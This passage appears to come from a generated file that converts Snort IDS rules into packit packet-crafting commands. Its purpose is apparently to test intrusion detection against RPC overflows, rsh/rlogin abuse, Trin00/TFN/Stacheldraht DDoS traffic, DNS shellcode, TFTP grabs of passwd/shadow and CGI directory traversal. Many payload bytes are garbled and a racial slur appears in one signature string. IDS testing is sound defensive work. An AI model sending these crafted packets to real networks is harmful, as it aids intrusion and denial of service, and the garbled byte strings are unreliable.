overflow attempt UDP" classtype:rpc-portmap-decode sid:2027 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†Š" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,64,0,relative "RPC yppasswd old password overflow attempt TCP" classtype:rpc-portmap-decode sid:2028 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†Š" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_jump:4,0,relative,align byte_test:4,>,64,0,relative "RPC yppasswd username overflow attempt UDP" classtype:rpc-portmap-decode cve,CVE-2001-0779 bugtraq,2763 sid:2025 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†Š" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_jump:4,0,relative,align byte_test:4,>,64,0,relative "RPC yppasswd username overflow attempt TCP" classtype:rpc-portmap-decode cve,CVE-2001-0779 bugtraq,2763 sid:2026 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†Š" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_jump:4,0,relative,align byte_jump:4,0,relative,align byte_test:4,>,64,0,relative "RPC yppasswd new password overflow attempt UDP" classtype:rpc-portmap-decode sid:2029 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†Š" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_jump:4,0,relative,align byte_jump:4,0,relative,align byte_test:4,>,64,0,relative "RPC yppasswd new password overflow attempt TCP" classtype:rpc-portmap-decode sid:2030 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†Š" -p "" -p "" # "RPC yppasswd user update UDP" classtype:rpc-portmap-decode sid:2031 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†Š" -p "" -p "" # "RPC yppasswd user update TCP" classtype:rpc-portmap-decode sid:2032 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†¤" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap ypserv request UDP" bugtraq,6016 bugtraq,5914 cve,CAN-2002-1232 cve,CVE-2000-1042 cve,CVE-2000-1043 arachnids,12 classtype:rpc-portmap-decode sid:590 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†¤" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap ypserv request TCP" bugtraq,6016 bugtraq,5914 cve,CAN-2002-1232 cve,CVE-2000-1042 cve,CVE-2000-1043 arachnids,12 classtype:rpc-portmap-decode sid:1276 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†¤" -p " " -p "" # "RPC ypserv maplist request UDP" bugtraq,6016 bugtraq,5914 cve,CAN-2002-1232 classtype:rpc-portmap-decode sid:2033 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†¤" -p " " -p "" # "RPC ypserv maplist request TCP" bugtraq,6016 bugtraq,5914 Cve,CAN-2002-1232 classtype:rpc-portmap-decode sid:2034 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p " p" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap network-status-monitor request UDP" classtype:rpc-portmap-decode sid:2035 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p " p" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap network-status-monitor request TCP" classtype:rpc-portmap-decode sid:2036 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p " p" -p "" -p "" # "RPC network-status-monitor mon-callback request UDP" classtype:rpc-portmap-decode sid:2037 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p " p" -p "" -p "" # "RPC network-status-monitor mon-callback request TCP" classtype:rpc-portmap-decode sid:2038 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†ľ" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap nlockmgr request UDP" cve,CVE-2000-0508 bugtraq,1372 classtype:rpc-portmap-decode sid:2079 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†ľ" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap nlockmgr request TCP" cve,CVE-2000-0508 bugtraq,1372 classtype:rpc-portmap-decode sid:2080 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "÷h" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap rpc.xfsmd request UDP" cve,CAN-2002-0359 bugtraq,5075 classtype:rpc-portmap-decode sid:2081 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "÷h" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap rpc.xfsmd request TCP" cve,CAN-2002-0359 bugtraq,5075 classtype:rpc-portmap-decode sid:2082 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "÷h" -p " " -p "" # "RPC rpc.xfsmd xfs_export attempt UDP" cve,CAN-2002-0359 bugtraq,5075 classtype:rpc-portmap-decode sid:2083 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "÷h" -p " " -p "" # "RPC rpc.xfsmd xfs_export attempt TCP" cve,CAN-2002-0359 bugtraq,5075 classtype:rpc-portmap-decode sid:2084 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "‡}" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap kcms_server request UDP" cve,CAN-2003-0027 url,www.kb.cert.org/vuls/id/850785 classtype:rpc-portmap-decode sid:2005 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "‡}" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap kcms_server request TCP" cve,CAN-2003-0027 url,www.kb.cert.org/vuls/id/850785 classtype:rpc-portmap-decode sid:2006 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 32771:34000 -p "‡}" -p "/../" -p "" #Cannot convert: byte_jump:4,20,relative,align byte_jump:4,4,relative,align "RPC kcms_server directory traversal attempt" cve,CAN-2003-0027 url,www.kb.cert.org/vuls/id/850785 classtype:misc-attack sid:2007 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "‡ˆ" -p "" -p "" #Cannot convert: byte_jump:4,8,relative,align "RPC sadmind query with root credentials attempt TCP" classtype:misc-attack sid:2255 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "‡ˆ" -p "" -p "" #Cannot convert: byte_jump:4,8,relative,align "RPC sadmind query with root credentials attempt UDP" classtype:misc-attack sid:2256 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 513 -p "::::::::::::::::" # "RSERVICES rlogin LinuxNIS" classtype:bad-unknown sid:601 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 513 -p "binbin" # "RSERVICES rlogin bin" arachnids,384 classtype:attempted-user sid:602 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 513 -p "echo \" + + \"" # "RSERVICES rlogin echo++" arachnids,385 classtype:bad-unknown sid:603 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 513 -p "-froot" # "RSERVICES rsh froot" arachnids,387 classtype:attempted-admin sid:604 packit -t TCP -s $HOME_NET --S 513 -d $EXTERNAL_NET -p "rlogind: Permission denied." # "RSERVICES rlogin login failure" arachnids,392 classtype:unsuccessful-user sid:611 packit -t TCP -s $HOME_NET --S 513 -d $EXTERNAL_NET -p "login incorrect" # "RSERVICES rlogin login failure" arachnids,393 classtype:unsuccessful-user sid:605 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 513 -p "rootroot" # "RSERVICES rlogin root" arachnids,389 classtype:attempted-admin sid:606 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 514 -p "binbin" # "RSERVICES rsh bin" arachnids,390 classtype:attempted-user sid:607 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 514 -p "echo \"+ +\"" # "RSERVICES rsh echo + +" arachnids,388 classtype:attempted-user sid:608 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 514 -p "-froot" # "RSERVICES rsh froot" arachnids,387 classtype:attempted-admin sid:609 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 514 -p "rootroot" # "RSERVICES rsh root" arachnids,391 classtype:attempted-admin sid:610 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 512 -p "" -p "" -p "" # "RSERVICES rexec username overflow attempt" classtype:attempted-admin sid:2113 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 512 -p "" -p "" -p "" # "RSERVICES rexec password overflow attempt" classtype:attempted-admin sid:2114 #packit -s $EXTERNAL_NET -d $HOME_NET #Cannot convert: dsize:408 "DOS Jolt attack" cve,CAN-1999-0345 classtype:attempted-dos sid:268 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -n 242 # "DOS Teardrop attack" cve,CAN-1999-0015 url,www.cert.org/advisories/CA-1997-28.html bugtraq,124 classtype:attempted-dos sid:270 packit -t UDP --S 19 --D 7 # "DOS UDP echo+chargen bomb" cve,CAN-1999-0635 cve,CVE-1999-0103 classtype:attempted-dos sid:271 packit -t UDP --D 19 --S 7 # "DOS UDP echo+chargen bomb" cve,CAN-1999-0635 cve,CVE-1999-0103 classtype:attempted-dos sid:271 packit -s $EXTERNAL_NET -d $HOME_NET -p "" -t ip_proto: 2 # "DOS IGMP dos attack" cve,CVE-1999-0918 classtype:attempted-dos sid:272 packit -s $EXTERNAL_NET -d $HOME_NET -p "" -t ip_proto:2 # "DOS IGMP dos attack" cve,CVE-1999-0918 classtype:attempted-dos sid:273 packit -t ICMP -s $EXTERNAL_NET -d $HOME_NET -p "+++ath" # "DOS ath" nocase-ignored cve,CAN-1999-1228 arachnids,264 classtype:attempted-dos sid:274 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -F SYN -q 6060842 -n 413 # "DOS NAPTHA" cve,CAN-2000-1039 url,www.microsoft.com/technet/security/bulletin/MS00-091.asp url,www.cert.org/advisories/CA-2000-21.html url,razor.bindview.com/publish/advisories/adv_NAPTHA.html bugtraq,2022 classtype:attempted-dos sid:275 packit -t TCP -d $EXTERNAL_NET -s $HOME_NET -F SYN -q 6060842 -n 413 # "DOS NAPTHA" cve,CAN-2000-1039 url,www.microsoft.com/technet/security/bulletin/MS00-091.asp url,www.cert.org/advisories/CA-2000-21.html url,razor.bindview.com/publish/advisories/adv_NAPTHA.html bugtraq,2022 classtype:attempted-dos sid:275 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 7070 -p "˙ô˙ý" # "DOS Real Audio Server" bugtraq,1288 cve,CVE-2000-0474 arachnids,411 classtype:attempted-dos sid:276 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 7070 -p "/viewsource/template.html?" # "DOS Real Server template.html" nocase-ignored cve,CVE-2000-0474 bugtraq,1288 classtype:attempted-dos sid:277 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 8080 -p "/viewsource/template.html?" # "DOS Real Server template.html" nocase-ignored cve,CVE-2000-0474 bugtraq,1288 classtype:attempted-dos sid:278 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 161 #Cannot convert: dsize:0 "DOS Bay/Nortel Nautica Marlin" bugtraq,1009 cve,CVE-2000-0221 classtype:attempted-dos sid:279 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 9 -p "NAMENAME" # "DOS Ascend Route" bugtraq,714 cve,CVE-1999-0060 arachnids,262 classtype:attempted-dos sid:281 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 617 #Cannot convert: dsize:>1445 "DOS arkiea backup" bugtraq,662 cve,CVE-1999-0788 arachnids,261 classtype:attempted-dos sid:282 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 135:139 -F URG # "DOS Winnuke attack" bugtraq,2010 cve,CVE-1999-0153 classtype: attempted-dos sid:1257 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 3372 #Cannot convert: dsize:>1023 "DOS MSDTC attempt" bugtraq,4006 classtype:attempted-dos sid:1408 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 6004 -p "˙˙˙˙˙˙" # "DOS iParty DOS attempt" classtype:misc-attack cve,CAN-1999-1566 sid:1605 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 6789:6790 #Cannot convert: dsize:1 "DOS DB2 dos attempt" classtype:denial-of-service sid:1641 #packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D 80 -p "" #Cannot convert: dsize:1 "DOS Cisco attempt" classtype:web-application-attack sid:1545 packit -t ICMP -s $EXTERNAL_NET -d $HOME_NET -n 678 -p "1234" # "DDOS TFN Probe" arachnids,443 classtype:attempted-recon sid:221 packit -t ICMP -s $EXTERNAL_NET -d $HOME_NET -N icmp_id: 0 -p "AAAAAAAAAA" # "DDOS tfn2k icmp possible communication" arachnids,425 classtype:attempted-dos sid:222 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 31335 -p "PONG" # "DDOS Trin00 Daemon to Master PONG message detected" arachnids,187 classtype:attempted-recon sid:223 packit -t ICMP -s $EXTERNAL_NET -d $HOME_NET -N icmp_id: 456 -Q icmp_seq: 0 # "DDOS TFN client command BE" arachnids,184 classtype:attempted-dos sid:228 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 20432 # "DDOS shaft client to handler" arachnids,254 classtype:attempted-dos sid:230 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 31335 -p "l44" # "DDOS Trin00 Daemon to Master message detected" arachnids,186 classtype:attempted-dos sid:231 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 31335 -p "*HELLO*" # "DDOS Trin00 Daemon to Master *HELLO* message detected" arachnids,185 url,www.sans.org/newlook/resources/IDFAQ/trinoo.htm classtype:attempted-dos sid:232 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 27665 -p "betaalmostdone" # "DDOS Trin00 Attacker to Master default startup password" arachnids,197 classtype:attempted-dos sid:233 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 27665 -p "gOrave" # "DDOS Trin00 Attacker to Master default password" classtype:attempted-dos sid:234 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 27665 -p "killme" # "DDOS Trin00 Attacker to Master default mdie password" classtype:bad-unknown sid:235 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 27444 -p "l44adsl" # "DDOS Trin00 Master to Daemon default password attempt" arachnids,197 classtype:attempted-dos sid:237 packit -t ICMP -s $HOME_NET -d $EXTERNAL_NET -N icmp_id:123 -Q icmp_seq:0 -p "shell bound to port" # "DDOS TFN server response" arachnids,182 classtype:attempted-dos sid:238 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 18753 -p "alive tijgu" # "DDOS shaft handler to agent" arachnids,255 classtype:attempted-dos sid:239 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 20433 -p "alive" # "DDOS shaft agent to handler" arachnids,256 classtype:attempted-dos sid:240 packit -t TCP -s $HOME_NET -d $EXTERNAL_NET -F SYN -q 674711609 # "DDOS shaft synflood" arachnids,253 classtype:attempted-dos sid:241 packit -t TCP -d $HOME_NET -s $EXTERNAL_NET -F SYN -q 674711609 # "DDOS shaft synflood" arachnids,253 classtype:attempted-dos sid:241 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 6838 -p "newserver" # "DDOS mstream agent to handler" classtype:attempted-dos sid:243 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 10498 -p "stream/" # "DDOS mstream handler to agent" cve,CAN-2000-0138 classtype:attempted-dos sid:244 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 10498 -p "ping" # "DDOS mstream handler ping to agent" cve,CAN-2000-0138 classtype:attempted-dos sid:245 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 10498 -p "pong" # "DDOS mstream agent pong to handler" classtype:attempted-dos sid:246 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 12754 -p ">" # "DDOS mstream client to handler" cve,CAN-2000-0138 classtype:attempted-dos sid:247 packit -t TCP -s $HOME_NET --S 12754 -d $EXTERNAL_NET -p ">" # "DDOS mstream handler to client" cve,CAN-2000-0138 classtype:attempted-dos sid:248 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 15104 -F SYN # "DDOS mstream client to handler" arachnids,111 cve,CAN-2000-0138 classtype:attempted-dos sid:249 packit -t TCP -s $HOME_NET --S 15104 -d $EXTERNAL_NET -p ">" # "DDOS mstream handler to client" cve,CAN-2000-0138 classtype:attempted-dos sid:250 packit -t ICMP -s $EXTERNAL_NET -d $HOME_NET -N icmp_id: 51201 -Q icmp_seq: 0 # "DDOS - TFN client command LE" arachnids,183 classtype:attempted-dos sid:251 packit -t ICMP -s 3.3.3.3/32 -d $EXTERNAL_NET -N icmp_id: 666 # "DDOS Stacheldraht server spoof" arachnids,193 classtype:attempted-dos sid:224 packit -t ICMP -s $HOME_NET -d $EXTERNAL_NET -p "sicken" -N icmp_id: 669 # "DDOS Stacheldraht gag server response" arachnids,195 classtype:attempted-dos sid:225 packit -t ICMP -s $HOME_NET -d $EXTERNAL_NET -p "ficken" -N icmp_id: 667 # "DDOS Stacheldraht server response" arachnids,191 classtype:attempted-dos sid:226 packit -t ICMP -s $EXTERNAL_NET -d $HOME_NET -p "spoofworks" -N icmp_id: 1000 # "DDOS Stacheldraht client spoofworks" arachnids,192 classtype:attempted-dos sid:227 packit -t ICMP -s $EXTERNAL_NET -d $HOME_NET -p "gesundheit!" -N icmp_id: 668 # "DDOS Stacheldraht client check gag" arachnids,194 classtype:attempted-dos sid:236 packit -t ICMP -s $EXTERNAL_NET -d $HOME_NET -p "skillz" -N icmp_id: 666 # "DDOS Stacheldraht client check skillz" arachnids,190 classtype:attempted-dos sid:229 packit -t ICMP -s $EXTERNAL_NET -d $HOME_NET -p "niggahbitch" -N icmp_id:9015 # "DDOS Stacheldraht handler->agent (niggahbitch)" url,staff.washington.edu/dittrich/misc/stacheldraht.analysis classtype:attempted-dos sid:1854 packit -t ICMP -d $EXTERNAL_NET -s $HOME_NET -p "niggahbitch" -N icmp_id:9015 # "DDOS Stacheldraht handler->agent (niggahbitch)" url,staff.washington.edu/dittrich/misc/stacheldraht.analysis classtype:attempted-dos sid:1854 packit -t ICMP -s $EXTERNAL_NET -d $HOME_NET -p "skillz" -N icmp_id:6666 # "DDOS Stacheldraht agent->handler (skillz)" url,staff.washington.edu/dittrich/misc/stacheldraht.analysis classtype:attempted-dos sid:1855 packit -t ICMP -d $EXTERNAL_NET -s $HOME_NET -p "skillz" -N icmp_id:6666 # "DDOS Stacheldraht agent->handler (skillz)" url,staff.washington.edu/dittrich/misc/stacheldraht.analysis classtype:attempted-dos sid:1855 packit -t ICMP -s $EXTERNAL_NET -d $HOME_NET -p "ficken" -N icmp_id:6667 # "DDOS Stacheldraht handler->agent (ficken)" url,staff.washington.edu/dittrich/misc/stacheldraht.analysis classtype:attempted-dos sid:1856 packit -t ICMP -d $EXTERNAL_NET -s $HOME_NET -p "ficken" -N icmp_id:6667 # "DDOS Stacheldraht handler->agent (ficken)" url,staff.washington.edu/dittrich/misc/stacheldraht.analysis classtype:attempted-dos sid:1856 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "ü" # "DNS zone transfer TCP" cve,CAN-1999-0532 arachnids,212 classtype:attempted-recon sid:255 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "ü" # "DNS zone transfer UDP" cve,CAN-1999-0532 arachnids,212 classtype:attempted-recon sid:1948 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "authors" -p "bind" # "DNS named authors attempt" nocase-ignored nocase-ignored nessus,10728 arachnids,480 classtype:attempted-recon sid:1435 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "authors" -p "bind" # "DNS named authors attempt" nocase-ignored nocase-ignored nessus,10728 arachnids,480 classtype:attempted-recon sid:256 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "version" -p "bind" # "DNS named version attempt" nocase-ignored nocase-ignored nocase-ignored nessus,10028 arachnids,278 classtype:attempted-recon sid:257 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "version" -p "bind" # "DNS named version attempt" nocase-ignored nocase-ignored nessus,10028 arachnids,278 classtype:attempted-recon sid:1616 packit -t UDP -s $EXTERNAL_NET --S 53 -d $HOME_NET -p "…€" -p "Ŕ <" # "DNS SPOOF query response PTR with TTL of 1 min. and no authority" classtype:bad-unknown sid:253 packit -t UDP -s $EXTERNAL_NET --S 53 -d $HOME_NET -p "€" -p "Ŕ <" # "DNS SPOOF query response with TTL of 1 min. and no authority" classtype:bad-unknown sid:254 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "../../../" # "DNS EXPLOIT named 8.2->8.2.1" cve,CVE-1999-0833 bugtraq,788 classtype:attempted-admin sid:258 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "ŤÍ € a" # "DNS EXPLOIT named tsig overflow attempt" cve,CVE-2001-0010 bugtraq,2302 arachnids,482 classtype:attempted-admin sid:303 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "€?" # "DNS EXPLOIT named tsig overflow attempt" classtype:attempted-admin sid:314 cve,CVE-2001-0010 bugtraq,2303 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "thisissometempspaceforthesockinaddrinyeahyeahiknowthisislamebutanywaywhocareshorizongotitworkingsoalliscool" # "DNS EXPLOIT named overflow (ADM)" cve,CVE-1999-0833 bugtraq,788 classtype:attempted-admin sid:259 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "ADMROCKS" # "DNS EXPLOIT named overflow (ADMROCKS)" cve,CVE-1999-0833 url,www.cert.org/advisories/CA-1999-14.html bugtraq,788 classtype:attempted-admin sid:260 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "̀č×˙˙˙/bin/sh" # "DNS EXPLOIT named overflow attempt" url,www.cert.org/advisories/CA-1998-05.html classtype:attempted-admin sid:261 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "1Ŕ°?1Űł˙1É̀1Ŕ" # "DNS EXPLOIT x86 Linux overflow attempt" classtype:attempted-admin sid:262 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "1Ŕ°̀…ŔuLëL^°" # "DNS EXPLOIT x86 Linux overflow attempt" classtype:attempted-admin sid:264 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "‰÷)ljó‰ů‰ňŹ<ţ" # "DNS EXPLOIT x86 Linux overflow attempt (ADMv2)" classtype:attempted-admin sid:265 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "ën^Ćš1ɉNĆF" # "DNS EXPLOIT x86 FreeBSD overflow attempt" classtype:attempted-admin sid:266 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "Ŕ ’ Đ#żř" # "DNS EXPLOIT sparc overflow attempt" classtype:attempted-admin sid:267 packit -t UDP --D 69 -p "" -p !"" # "TFTP filename overflow attempt" cve,CAN-2002-0813 bugtraq,5328 classtype:bad-unknown sid:1941 packit -t UDP --D 69 -p "" -p "admin.dll" # "TFTP GET Admin.dll" nocase-ignored classtype:successful-admin url,www.cert.org/advisories/CA-2001-26.html sid:1289 packit -t UDP --D 69 -p "" -p "nc.exe" # "TFTP GET nc.exe" nocase-ignored classtype:successful-admin sid:1441 packit -t UDP --D 69 -p "" -p "shadow" # "TFTP GET shadow" nocase-ignored classtype:successful-admin sid:1442 packit -t UDP --D 69 -p "" -p "passwd" # "TFTP GET passwd" nocase-ignored classtype:successful-admin sid:1443 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 69 -p ".." # "TFTP parent directory" cve,CAN-2002-1209 arachnids,137 cve,CVE-1999-0183 classtype:bad-unknown sid:519 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 69 -p "/" # "TFTP root directory" arachnids,138 cve,CVE-1999-0183 classtype:bad-unknown sid:520 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 69 -p "" # "TFTP Put" cve,CVE-1999-0183 arachnids,148 classtype:bad-unknown sid:518 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 69 -p "" # "TFTP Get" classtype:bad-unknown sid:1444 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/hsx.cgi" -p "../../" -p "%00" # "WEB-CGI HyperSeek hsx.cgi directory traversal attempt" bugtraq,2314 cve,CAN-2001-0253 classtype:web-application-attack sid:803 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/hsx.cgi" # "WEB-CGI HyperSeek hsx.cgi access" bugtraq,2314 cve,CAN-2001-0253 classtype:web-application-activity sid:1607 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/s.cgi" -p "tmpl=" # "WEB-CGI SWSoft ASPSeek Overflow attempt" nocase-ignored cve,CAN-2001-0476 bugtraq,2492 classtype:web-application-attack sid:804 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/wsisa.dll/WService=" -p "WSMadmin" # "WEB-CGI webspeed access" nocase-ignored nocase-ignored arachnids,467 cve,CVE-2000-0127 nessus,10304 classtype:attempted-user sid:805 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/YaBB" -p "../" # "WEB-CGI yabb directory traversal attempt" nocase-ignored cve,CVE-2000-0853 arachnids,462 bugtraq,1668 classtype:attempted-recon sid:806 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/YaBB" # "WEB-CGI yabb access" nocase-ignored cve,CVE-2000-0853 arachnids,462 bugtraq,1668 classtype:attempted-recon sid:1637 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/wwwboard/passwd.txt" # "WEB-CGI /wwwboard/passwd.txt access" nocase-ignored arachnids,463 cve,CVE-1999-0953 nessus,10321 bugtraq,649 classtype:attempted-recon sid:807 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/webdriver" # "WEB-CGI webdriver access" nocase-ignored arachnids,473 bugtraq,2166 nessus,10592 classtype:attempted-recon sid:808 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/whois_raw.cgi?" -p "" # "WEB-CGI whois_raw.cgi arbitrary command execution attempt" cve,CAN-1999-1063 arachnids,466 nessus,10306 classtype:web-application-attack sid:809 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/whois_raw.cgi" # "WEB-CGI whois_raw.cgi access" cve,CAN-1999-1063 arachnids,466 nessus,10306 classtype:attempted-recon sid:810 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p " /HTTP/1." # "WEB-CGI websitepro path access" nocase-ignored cve,CAN-2000-0066 arachnids,468 classtype:attempted-recon sid:811 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/webplus?about" # "WEB-CGI webplus version access" nocase-ignored cve,CVE-2000-0282 arachnids,470 classtype:attempted-recon sid:812 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/webplus?script" -p "../" # "WEB-CGI webplus directory traversal" nocase-ignored cve,CVE-2000-0282 arachnids,471 classtype:web-application-attack sid:813 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/websendmail" # "WEB-CGI websendmail access" nocase-ignored cve,CVE-1999-0196 arachnids,469 bugtraq,2077 nessus,10301 classtype:attempted-recon sid:815 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/dcforum.cgi" -p "forum=../.." # "WEB-CGI dcforum.cgi directory traversal attempt" cve,CAN-2001-0436 classtype:web-application-attack sid:1571 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/dcforum.cgi" # "WEB-CGI dcforum.cgi access" bugtraq,2728 classtype:attempted-recon sid:818 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/dcboard.cgi" -p "command=register" -p "%7cadmin" # "WEB-CGI dcboard.cgi invalid user addition attempt" bugtraq,2728 classtype:web-application-attack sid:817 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/dcboard.cgi" # "WEB-CGI dcboard.cgi access" bugtraq,2728 classtype:attempted-recon sid:1410 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/mmstdod.cgi" # "WEB-CGI mmstdod.cgi access" nocase-ignored cve,CVE-2001-0021 classtype:attempted-recon sid:819 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p 